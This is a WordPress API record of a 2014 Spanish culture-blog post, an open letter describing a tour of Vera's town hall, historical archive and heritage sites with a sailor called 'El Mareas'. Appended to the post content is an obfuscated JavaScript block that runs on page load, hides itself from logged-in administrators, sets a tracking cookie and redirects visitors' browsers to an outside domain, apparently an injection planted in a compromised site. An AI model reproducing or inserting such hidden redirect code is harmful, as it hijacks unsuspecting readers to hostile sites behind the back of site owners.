{"id":449,"date":"2014-06-30T10:33:44","date_gmt":"2014-06-30T10:33:44","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=449"},"modified":"2015-11-23T10:33:31","modified_gmt":"2015-11-23T10:33:31","slug":"reliquias-veratenses","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2014\/06\/30\/reliquias-veratenses\/","title":{"rendered":"RELIQUIAS VERATENSES"},"content":{"rendered":"<p><!-- p { margin-bottom: 0.25cm; direction: ltr; line-height: 120%; text-align: left; widows: 2; orphans: 2; } --><\/p>\n<p style=\"text-align: justify\" align=\"center\">(Carta abierta a mi amigo Ezequiel Navarrete Garres. Junio 2.014)<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Querido amigo:<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Me complace decirte que, el otro d\u00eda, cuando me presentaste a tu amigo Paco, \u201cEl Mareas\u201d, qued\u00e9 profunda y gratamente impresionado, no ya por su atuendo \u2013 camiseta a rayas, azul y blanca; pantal\u00f3n azulado; y gorra con funda blanca y visera de charol adornada con escudo de oro y doble ancla de la Marina Civil-, como bien lo describes en tus ingeniosos e interesantes art\u00edculos publicados en IDEAL@LEVANTE, sino por su expresiva mirada de viejo zorro de cabello plateado y faz rugosa de piel curtida por su exposici\u00f3n al sol. De por s\u00ed, he de decirte, Ezequiel, que llamaba bastante la atenci\u00f3n tu amigo \u201cEl Mareas\u201d cuando, tomando caf\u00e9 en la cafeter\u00eda Cl\u00e1sica de nuestra ciudad de Vera, observ\u00e9 c\u00f3mo, al levantarse y dejarse ver, la concurrencia habida en Plaza Mayor, dirigi\u00f3 la mirada hacia el inconfundible marino.<\/p>\n<p style=\"text-align: justify\" align=\"justify\"><!--more--><\/p>\n<p style=\"text-align: justify\" align=\"justify\">Pues bien, hace unos d\u00edas, al atardecer, -parece ser que le encanta Vera- me lo encontr\u00e9 en placeta de \u201cEl Berro\u201d esperando el autob\u00fas para Garrucha. Me dijo que su residencia era su propio barco; que en \u00e9l, viv\u00eda y dorm\u00eda; y que, entre sus aficiones, adem\u00e1s de la pesca y navegaci\u00f3n, prevalec\u00eda la visita a pueblos costeros del Mare Nostrum, desde el golfo de C\u00e1diz hasta Rosas (Gerona). As\u00ed las cosas, tras nuestra breve charla, me ofrec\u00ed a llevarlo a Garrucha y, ante su inter\u00e9s por conocer Vera y su rico y variado patrimonio hist\u00f3rico &#8211; cultural, quedamos emplazados en vernos, al d\u00eda siguiente, otra vez, en Plaza Mayor.<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Con puntualidad inglesa, a las once horas, tras saludarnos, mi invitado, provisto de c\u00e1mara fotogr\u00e1fica, sac\u00f3 unas instant\u00e1neas de la fachada principal del Ayuntamiento, as\u00ed como de la placa adosada en su pared con una inscripci\u00f3n que rememora a las personas que murieron en el terremoto de 1.518.<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Previa autorizaci\u00f3n, un funcionario del Consistorio nos acompa\u00f1\u00f3 en todo momento en nuestra visita. Nos llev\u00f3 al Archivo Hist\u00f3rico Municipal y a la Sala de Plenos del Ayuntamiento. Tambi\u00e9n, c\u00f3mo no, a sus dependencias m\u00e1s relevantes, entre ellas, la Sala de Juntas.<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Perm\u00edteme decirte, Ezequiel, que, una vez en el Archivo Hist\u00f3rico Municipal, tu amigo Paco, \u201cEl Mareas\u201d qued\u00f3 sorprendido, tanto en cuanto, en su contemplaci\u00f3n, no imaginaba la conservaci\u00f3n de documentos producidos por el Ayuntamiento desde 1.492 a trav\u00e9s de Actas Capitulares, conservadas \u00e9stas a partir de 1.496, aunque su creaci\u00f3n como Consistorio datase de 1.488. Se nos inform\u00f3 que a partir del 9 de noviembre de 1.518, a\u00f1o del terremoto que asol\u00f3 Vera, fue cuando el volumen documental comenz\u00f3 a ser bastante considerable. Tambi\u00e9n se nos dijo que la importancia del Archivo radica en la informaci\u00f3n de primera mano que ofrece a los investigadores interesados por cuestiones relativas al establecimiento de la Administraci\u00f3n Castellana en el Reino de Granada, a documentos de tem\u00e1tica militar y fronteriza, a repoblaci\u00f3n de la Axarqu\u00eda almeriense y conflicto con los moriscos, as\u00ed como control del agua y expedientes judiciales.<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Tras visitar la Sala de Exposiciones, Investigaciones y Tratamiento Documental del Archivo, el mismo funcionario nos traslad\u00f3 a la Sala de Plenos del Ayuntamiento. All\u00ed, en lugar prominente y en una vitrina bien ornamentada, pudimos ver el Pend\u00f3n Real con el escudo bordado del primer Borb\u00f3n espa\u00f1ol, Felipe V, y el municipal de Vera duplicado en ambos lados con un \u00e1guila bic\u00e9fala como soporte.<\/p>\n<p align=\"justify\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/06\/Captura-de-pantalla-2014-06-30-a-las-12.27.22.png\"><img decoding=\"async\" class=\"size-medium wp-image-451 aligncenter\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/06\/Captura-de-pantalla-2014-06-30-a-las-12.27.22-300x152.png\" alt=\"Captura de pantalla 2014-06-30 a la(s) 12.27.22\" width=\"300\" height=\"152\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/06\/Captura-de-pantalla-2014-06-30-a-las-12.27.22-300x152.png 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/06\/Captura-de-pantalla-2014-06-30-a-las-12.27.22.png 591w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: justify\" align=\"justify\">Ser\u00edan, amigo Ezequiel, las trece horas de este d\u00eda sofocante de calor primaveral cuando dimos por finalizada nuestra visita, emplazado el amigo \u201cMareas\u201d para, en otras ocasiones, si lo desea, acompa\u00f1arlo, a fin de que conozca las restantes reliquias de nuestro rico y variado patrimonio hist\u00f3rico \u2013 cultural: Excmo. Ayuntamiento, remodelado en el s. XVIII, pero de factura del XVI; Iglesia Fortaleza de Ntra. Sra. de la Encarnaci\u00f3n, s. XVI; Convento de los padres M\u00ednimos, s. XVII; Capilla de San Agust\u00edn, s. XVI; Ermita de San Ram\u00f3n, s. XVIII; Ermita de Ntra. Patrona la Virgen de las Angustias, s. XVIII; Ermita de la Virgen de la Huertas, s. XX; Ermita de San Ant\u00f3n, s. XIX; Fuente de los Cuatro Ca\u00f1os, s. XVII; Plaza de Toros, s. XIX; Glorieta, s.XIX; Cerro del Esp\u00edritu Santo y Ermita, s. XV; y Museo Etnogr\u00e1fico, s. XX.<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Para finalizar, me gustar\u00eda decirte, Ezequiel, que tu amigo \u201c El Mareas\u201d, por su \u201cmodus vivendi\u201d, me impresion\u00f3 bastante, con independencia de que vi en \u00e9l, adem\u00e1s de amplia cultura, un hombre afable, accesible al trato y gran conversador.<\/p>\n<p style=\"text-align: justify\" align=\"justify\">\u00a1Ah, a prop\u00f3sito! Se me olvidaba decirte que antes de despedirnos, siendo mi intenci\u00f3n presentarlo a Jos\u00e9 Antonio, Ram\u00f3n, Chencho y Pepe, lo invit\u00e9 a tomar una cerveza a nuestro lugar de tertulia, el Club de la Tercera Edad; pero all\u00ed, cosa rara, no se encontraba ninguno, a pesar de las ganas por conocer a tu entra\u00f1able y, seg\u00fan ellos, enigm\u00e1tico amigo.<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Recibe un afectuoso y cordial saludo.<\/p>\n<figure id=\"attachment_23\" aria-describedby=\"caption-attachment-23\" style=\"width: 180px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/02\/150571_129346217122812_100001423032344_190639_1342949_a.jpg\"><img decoding=\"async\" class=\"size-full wp-image-23\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/02\/150571_129346217122812_100001423032344_190639_1342949_a.jpg\" alt=\"Diego Morales Carmona\" width=\"180\" height=\"109\" \/><\/a><figcaption id=\"caption-attachment-23\" class=\"wp-caption-text\">Diego Morales Carmona<\/figcaption><\/figure>\n<p style=\"text-align: center\" align=\"justify\">\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>(Carta abierta a mi amigo Ezequiel Navarrete Garres. Junio 2.014) Querido amigo: Me complace decirte que, el otro d\u00eda, cuando me presentaste a tu amigo Paco, \u201cEl Mareas\u201d, qued\u00e9 profunda y gratamente impresionado, no ya por su atuendo \u2013 camiseta a rayas, azul y blanca; pantal\u00f3n azulado; y gorra con funda blanca y visera de &hellip; <a href=\"https:\/\/blog.vera.es\/cultura\/2014\/06\/30\/reliquias-veratenses\/\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">RELIQUIAS VERATENSES<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":450,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20],"tags":[],"class_list":["post-449","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboraciones"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/449","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=449"}],"version-history":[{"count":2,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/449\/revisions"}],"predecessor-version":[{"id":1688,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/449\/revisions\/1688"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/450"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=449"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=449"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=449"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}